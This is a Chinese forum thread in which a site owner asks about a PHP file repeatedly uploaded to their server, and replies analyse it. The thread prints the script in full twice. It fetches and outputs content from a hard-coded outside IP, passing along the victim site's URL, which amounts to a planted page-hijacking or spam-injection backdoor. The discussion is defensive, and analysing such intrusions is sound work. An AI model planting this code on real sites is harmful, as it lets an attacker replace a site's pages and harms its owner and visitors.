array(
'method'=>get,
'header'=>user-agent: aq0o010o
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context);
if (empty($html)) {
exit(
connection error!
);
}
return $html;
}
?>
这什么意图?求高手分析下
回复讨论(解决方案) 他把这个代码放到你根目录下,网站是不是访问不了?
好像是他把你网站 原始地址 传到他自己写的一个方法里面 用 host 参数接受 然后抓取你首页的信息吧
我网站没异常(我还没发现异常)
好像是他把你网站 原始地址 传到他自己写的一个方法里面 用 host 参数接受 然后抓取你首页的信息吧
我网站没异常(我还没发现异常) 上面我的描述有问题,这个文件不是放在更目录,是放在根目录的上一个目录,如图:
public_html 这个目录里面是网站的根目录,他这个文件和public_html放在同一个目录,不知道他这样对我的网站有什么影响。 这sb隔天来次,已经删了几次了。
linux系统,目前权限设置为755,设置为644网站就打不开了,有什么办法不让他上次文件吗?
$remote_server./index.html?host=.$host_name 这个地方他把你的网站地址传过去 不知道干什么了 ,代码在那个ip的服务器上面 看不到。。。。。猜不来他要干什么。。。。。
服务器 那方面的我不懂,等高手来把,
谢谢你 没有异常?
set_time_limit(0); //永不超时
header(content-type: text/html;charset=gb2312); //指定浏览器字符集
$remote_server = http://122.114.126.160/; //远程网站
$host_name = http://.$_server['server_name'].$_server['php_self']; //构造当前页的 url
$useragent = $_server['http_user_agent']; //获取浏览者的浏览器信息
$content_mb=gethttppage($remote_server./index.html?host=.$host_name); //调用远程网站
echo $content_mb; //输出远程网站返回内容
exit(); //退出程序运行
function gethttppage($url) { //调用远程网站函数
$opts = array(
'http'=>array(
'method'=>get,
'header'=>user-agent: aq0o010o
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context); //访问远程网站,你的url也传过去了
if (empty($html)) {
exit(
connection error!
);
}
return $html;
}
至于对方做了什么?目前尚不清楚
如果是在本地开发环境,返回的是广告,正常的页面没有了
如果是运行中的网站,那么若没异样的话,就说明潜在的威胁是很大的(csrf攻击)
仅是出一点广告,倒是也无所谓 不管怎么样,先把对方的ip给禁掉吧,配置你的服务器:禁止122.114.126.160的ip访问你的网站。
把你页面的内容替换了。
先看看程序那里有漏洞让人上传文件比较好,漏洞不封以后还是很多问题的。
没有异常?
set_time_limit(0); //永不超时
header(content-type: text/html;charset=gb2312); //指定浏览器字符集
$remote_server = http://122.114.126.160/; //远程网站
$host_name = http://.$_server['server_name'].$_server['php_self']; //构造当前页的 url
$useragent = $_server['http_user_agent']; //获取浏览者的浏览器信息
$content_mb=gethttppage($remote_server./index.html?host=.$host_name); //调用远程网站
echo $content_mb; //输出远程网站返回内容
exit(); //退出程序运行
function gethttppage($url) { //调用远程网站函数
$opts = array(
'http'=>array(
'method'=>get,
'header'=>user-agent: aq0o010o
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context); //访问远程网站,你的url也传过去了
if (empty($html)) {
exit(
connection error!
);
}
return $html;
}
至于对方做了什么?目前尚不清楚
如果是在本地开发环境,返回的是广告,正常的页面没有了
如果是运行中的网站,那么若没异样的话,就说明潜在的威胁是很大的(csrf攻击)
仅是出一点广告,倒是也无所谓
-------------------------
感谢
不管怎么样,先把对方的ip给禁掉吧,配置你的服务器:禁止122.114.126.160的ip访问你的网站。
-------------------------
感谢
把你页面的内容替换了。
先看看程序那里有漏洞让人上传文件比较好,漏洞不封以后还是很多问题的。
-------------------------
感谢 我猜测他是想放到你public_html文件夹下seo.php,如果有文件就是替换掉里面的文件
结果/打错了,变成还在外面的文件夹
我猜测他是想放到你public_html文件夹下seo.php,如果有文件就是替换掉里面的文件
结果/打错了,变成还在外面的文件夹
谢谢 有可能